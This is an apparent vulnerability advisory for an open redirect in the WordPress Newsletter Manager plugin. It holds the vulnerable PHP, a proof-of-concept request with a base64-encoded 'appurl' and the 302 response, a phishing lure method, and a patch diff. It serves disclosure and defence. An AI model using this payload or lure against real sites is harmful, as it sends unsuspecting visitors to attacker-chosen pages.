Skip to content

Newsletter Manager - Unauthenticated Open Redirect

Summary

Description Details
Name Newsletter Manager - Unauthenticated Open Redirect
Summary In email subscription url, appurl is not sanitized making visitors redirect to any external site
Affected application newsletter-manager
Affected revision all
Vendor update available No
CVE
Ids CWE-601
CVSSv3.0 Base Score 5.8
CVSS vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
Public Exploit available Yes
Exploit verified Yes
Authentication Required No

Vulnerable Code

<?php
 33 $xyz_em_url = base64_decode($_GET['appurl']);
 34 if($xyz_em_url=='')
 35         $xyz_em_url=get_option('xyz_em_emailConfirmation');


166         if(strpos($xyz_em_url,'?') > 0)
167         {
168                 $xyz_em_url = $xyz_em_url."&result=success";
169 
170         }else{
171                 $xyz_em_url = $xyz_em_url."?result=success";
172         }
173 
174         if($xyz_em_statusWelcomeFlag == 1)
175                 $xyz_em_url = $xyz_em_url."&confirm=true"; // need to confirm.
176         else
177                 $xyz_em_url = $xyz_em_url."&confirm=false"; // already confirmed.
178 
179         header("Location:".$xyz_em_url);

Exploit :

>  base64.b64encode(b"https://www.bountysite.com")                                                                                                      
b'aHR0cHM6Ly93d3cuYm91bnR5c2l0ZS5jb20='


http -v  "http://fv-wordpress-flowplayer-wp.vulnsite.xxyy/?wp_nlm=confirmation&eId=1&both=af7d6dc1065c5d29f5a1acd0f68e3917&lId=1&both=&appurl=aHR0cHM6Ly93d3cuYm91bnR5c2l0ZS5jb20="  
GET /?wp_nlm=confirmation&eId=1&both=af7d6dc1065c5d29f5a1acd0f68e3917&lId=1&both=&appurl=aHR0cHM6Ly93d3cuYm91bnR5c2l0ZS5jb20= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: fv-wordpress-flowplayer-wp.vulnsite.xxyy
User-Agent: HTTPie/1.0.2



HTTP/1.1 302 Moved Temporarily
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Date: Wed, 22 May 2019 06:53:00 GMT
Keep-Alive: timeout=5, max=100
Location: https://www.bountysite.com?result=failure
Server: Apache
Transfer-Encoding: chunked

Note Location header > Location: https://www.bountysite.com?result=failure

Exploit Methodology

The attacker will have to do the following to exploit this vulnerability:-

  • Attackers needs to send a registration link over mail, luring victim to click on the link
  • Victim opens the link and is redirected to external malicious site

Security Patch

BountySite security patch.

diff --git a/wp-content/plugins/newsletter-manager/confirmation.php b/wp-content/plugins/newsletter-manager/confirmation.php
index 4c21ba4..54dbc4e 100644
--- a/wp-content/plugins/newsletter-manager/confirmation.php
+++ b/wp-content/plugins/newsletter-manager/confirmation.php
@@ -34,6 +34,11 @@ $xyz_em_url = base64_decode($_GET['appurl']);
 if($xyz_em_url=='')
        $xyz_em_url=get_option('xyz_em_emailConfirmation');

+$valid_appurl_pos = strpos( $xyz_em_url , get_option('xyz_em_emailConfirmation') );
+if ( ( ! $valid_appurl_pos ) or ( $valid_appurl_pos != 0 )  ) {
+        $xyz_em_url=get_option('xyz_em_emailConfirmation');
+}
+
 if($combineValue == $xyz_em_both){

 $xyz_em_statusWelcomeFlag = 0;